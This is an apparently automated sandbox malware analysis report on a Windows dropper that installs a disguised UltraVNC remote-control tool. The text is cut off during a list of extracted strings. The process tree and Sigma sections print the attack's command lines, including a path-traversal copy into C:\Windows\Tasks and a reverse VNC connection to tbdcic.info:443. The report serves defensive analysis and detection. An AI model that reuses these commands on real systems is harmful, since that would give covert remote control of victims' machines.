Edit tour

Windows Analysis Report
T8xrZb7nBL.exe

Overview

General Information

Sample name:	T8xrZb7nBL.exe renamed because original name is a hash value
Original sample name:	d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Analysis ID:	1579878
MD5:	1677bd5b561b890396ae1816066ca481
SHA1:	9ba4b30a162a261b27397bc1dc3736b94b786f65
SHA256:	d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
Tags:	exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected UltraVNC Hacktool

AI detected suspicious sample

Contains VNC / remote desktop functionality (version string found)

Contains functionality to register a low level keyboard hook

Drops executables to the windows directory (C:\Windows) and starts them

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Suspicious UltraVNC Execution

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Process Start Locations

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

T8xrZb7nBL.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\T8xrZb7nBL.exe" MD5: 1677BD5B561B890396AE1816066CA481)

cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7616 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7776 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

Acrobat.exe (PID: 7820 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 8080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 5256 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

timeout.exe (PID: 7836 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 8048 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8112 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7712 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 1836 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

browser_sn.exe (PID: 8328 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 8344 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

browser_sn.exe (PID: 8704 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 8712 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8784 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 8852 cmdline: cmd /c "C:\Windows\Tasks\3889122.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

timeout.exe (PID: 8868 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 8900 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8928 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

browser_sn.exe (PID: 8944 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 8960 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

browser_sn.exe (PID: 9020 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)

timeout.exe (PID: 9032 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 9064 cmdline: timeout /t 600 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Tasks\browser_sn.exe	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
C:\Windows\Tasks\Xv6Ya.d8LhT	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: T8xrZb7nBL.exe PID: 7460	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: browser_sn.exe PID: 8328	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: browser_sn.exe PID: 8704	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: browser_sn.exe PID: 8944	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Process Memory Space: browser_sn.exe PID: 9020	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
37.2.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
24.0.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
35.2.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
28.2.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
28.0.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
37.0.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
24.2.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
35.0.browser_sn.exe.7ff790c30000.0.unpack	JoeSecurity_UltraVNC	Yara detected UltraVNC Hacktool	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 8328, ProcessName: browser_sn.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7724, TargetFilename: C:\Windows\Tasks\conhost.exe

Sigma detected: Suspicious UltraVNC Execution

Source: Process started

Author: Bhabesh Raj: Data: Command: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, ProcessId: 8704, ProcessName: browser_sn.exe

Sigma detected: Potential Command Line Path Traversal Evasion Attempt

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7460, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7552, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7460, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7552, ProcessName: cmd.exe

Sigma detected: Suspicious Process Start Locations

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 8328, ProcessName: browser_sn.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Source: T8xrZb7nBL.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
Source:	Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1291956543.00000000027A4000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr

Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\T8xrZb7nBL.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	24_2_00007FF790C5C210
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	24_2_00007FF790CEA228
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	24_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 24_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	24_2_00007FF790C35910
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C5C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	28_2_00007FF790C5C210
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790CEA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	28_2_00007FF790CEA228
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	28_2_00007FF790C56DD1
Source: C:\Windows\Tasks\browser_sn.exe	Code function: 28_2_00007FF790C35910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	28_2_00007FF790C35910

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C56DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,

24_2_00007FF790C56DD1

Source: Joe Sandbox View

ASN Name: RSHB-ASRU RSHB-ASRU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Tasks\browser_sn.exe

Code function: 24_2_00007FF790C3BB70 recv,

24_2_00007FF790C3BB70

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: tbdcic.info

Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.15.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://forum.uvnc.com
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: T8xrZb7nBL.exe, 00000000.00000003.1294187731.0000000000979000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000297A000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: T8xrZb7nBL.exe, 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 